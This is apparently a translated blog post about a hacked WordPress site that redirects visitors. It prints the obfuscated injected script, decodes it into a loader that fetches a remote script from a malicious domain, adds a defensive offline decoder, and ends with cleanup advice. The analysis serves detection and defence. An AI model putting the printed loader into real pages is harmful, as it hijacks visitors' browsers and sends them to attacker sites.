WordPress Trojan virus injection case

Sharing a case of a foreign-trade WordPress website being maliciously redirected

Yesterday I saw a webmaster in the group asking why a website built with WordPress automatically jumps to other people's websites as soon as it is opened. I then chatted with him privately and visited the website.

WordPress infected with malicious redirection code

When the website is opened and more than half of its content has loaded, it automatically jumps to a third-party website, and then jumps through several websites in succession.

At the same time, you will be asked to give notification permission to the website you have jumped to, as shown below:

[Image: Chrome notification permission prompt]

Then I analyzed the source code of the website (a lot of plug-ins were installed, which led to a lot of JS and other code; too messy).

Finally, I found that the following code was abnormal. I asked the webmaster, and it was neither his own nor from the plug-ins he installed.

 <script> eval(String.fromCharCode (118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115 , 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56,  44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39,  47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101,  110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97,  103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125)); </script>

Then I searched for eval(String.fromCharCode and found the following article, which records a similar case:

Record – website is HACK!

Then I used the jdstiles.com website to decode the above code:

 var d=document;var s=d.createElement('script');  s.type='text/javascript'; s.async=true; var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109); s.src=pl+'/stat.js?l=11&';  if (document.currentScript) {  document.currentScript.parentNode.insertBefore(s,  document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }

Decoding the numbers in the code above once more yields the following website:

 https://blackawardago.com
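The two decoding passes described above can be done offline, without pasting the payload into a third-party site and without ever running it. The following is an added example, not code from the original post; the function names and the `loader.example` host in the constructed sample are assumptions for illustration.

```javascript
// Added example: static decoder for eval(String.fromCharCode(...)) injections.
// Nothing is executed: the numbers are turned into text, which is searched again.

// Matches String.fromCharCode(<decimal list>), tolerating stray whitespace.
const CHARCODE_CALL = /String\s*\.\s*fromCharCode\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)/g;

// Decode one comma-separated list of decimal character codes.
function decodeList(list) {
  const codes = list.split(',').map((n) => parseInt(n.trim(), 10));
  return codes.map((c) => String.fromCharCode(c)).join('');
}

// Return every decoded layer found in `text`, outermost first.
// maxDepth bounds the work so hostile input cannot nest forever.
function decodeLayers(text, maxDepth = 5) {
  const found = [];
  let frontier = [text];
  for (let depth = 1; depth <= maxDepth && frontier.length > 0; depth++) {
    const next = [];
    for (const chunk of frontier) {
      for (const m of chunk.matchAll(CHARCODE_CALL)) {
        const decoded = decodeList(m[1]);
        found.push({ depth, decoded });
        next.push(decoded); // a decoded layer may hide another encoded string
      }
    }
    frontier = next;
  }
  return found;
}

// Collect http(s) URLs from the decoded layers, for blocking or log searches.
function extractUrls(layers) {
  const urls = new Set();
  for (const { decoded } of layers) {
    for (const m of decoded.matchAll(/https?:\/\/[^\s'"<>)]+/g)) urls.add(m[0]);
  }
  return [...urls];
}

// Constructed sample with the same two-layer shape as the injection above.
// loader.example is a placeholder host, not a value taken from the page.
const toCodes = (s) => Array.from(s, (c) => c.charCodeAt(0)).join(', ');
const inner = `String.fromCharCode(${toCodes('https://loader.example')})`;
const outer = toCodes(`var pl = ${inner}; s.src=pl+'/stat.js?l=11&';`);
const SAMPLE = `<script>eval(String.fromCharCode(${outer}));</script>`;

const sampleLayers = decodeLayers(SAMPLE);
console.log(sampleLayers.map((l) => `[layer ${l.depth}] ${l.decoded}`).join('\n'));
console.log('URLs:', extractUrls(sampleLayers));
```

The same functions can be run over the text of a theme file, a plug-in file or a database field to see what an encoded block would load.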

Whatever website it turns out to be, it is clear that the website was hacked.

This malicious redirection code, known abroad as the WordPress redirect hack, seems to have become popular since 18 years ago. The following are two articles I saw when I searched for information.

https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware

https://stackoverflow.com/questions/52282559/how-to-delete-script-injected-on-wordpress-site-ads-voipnewswire-net

If you want to know whether your website has also been hit by this malicious redirect code, you can check it with the following website.

https://sitecheck.sucuri.net/

Methods to clear malicious redirection codes in WordPress

Of course, if your WordPress site has been hit, how do you remove the malicious redirection code? (Because the webmaster didn't ask me to help him deal with it, I didn't touch the actual code. The following are the general handling methods.)

Solution if you understand code

  1. Find out the malicious code and delete it.
  2. Check all files and code on the website for infected or unknown scripts, and delete them.
  3. Check whether the database is infected. If so, delete the infected content.

Solution if you do not understand code

  1. Pay someone who understands code to help you clean up. I think the foreign one above is 108 yuan/year.
  2. Delete the website and reinstall it, making sure to use safe themes and plug-ins, that the database is not infected, and that the server is secure.

If any expert reading this article knows how to clean up this malicious code, or has experience in cleaning up malicious code, please leave a message with advice.

Finally, we recommend a plug-in: Install a firewall for WordPress! Try Wordfence

Relevant knowledge: Do a good job of security protection to prevent WordPress website from being hacked

This is the 2nd/20th article in the series: WordPress Security
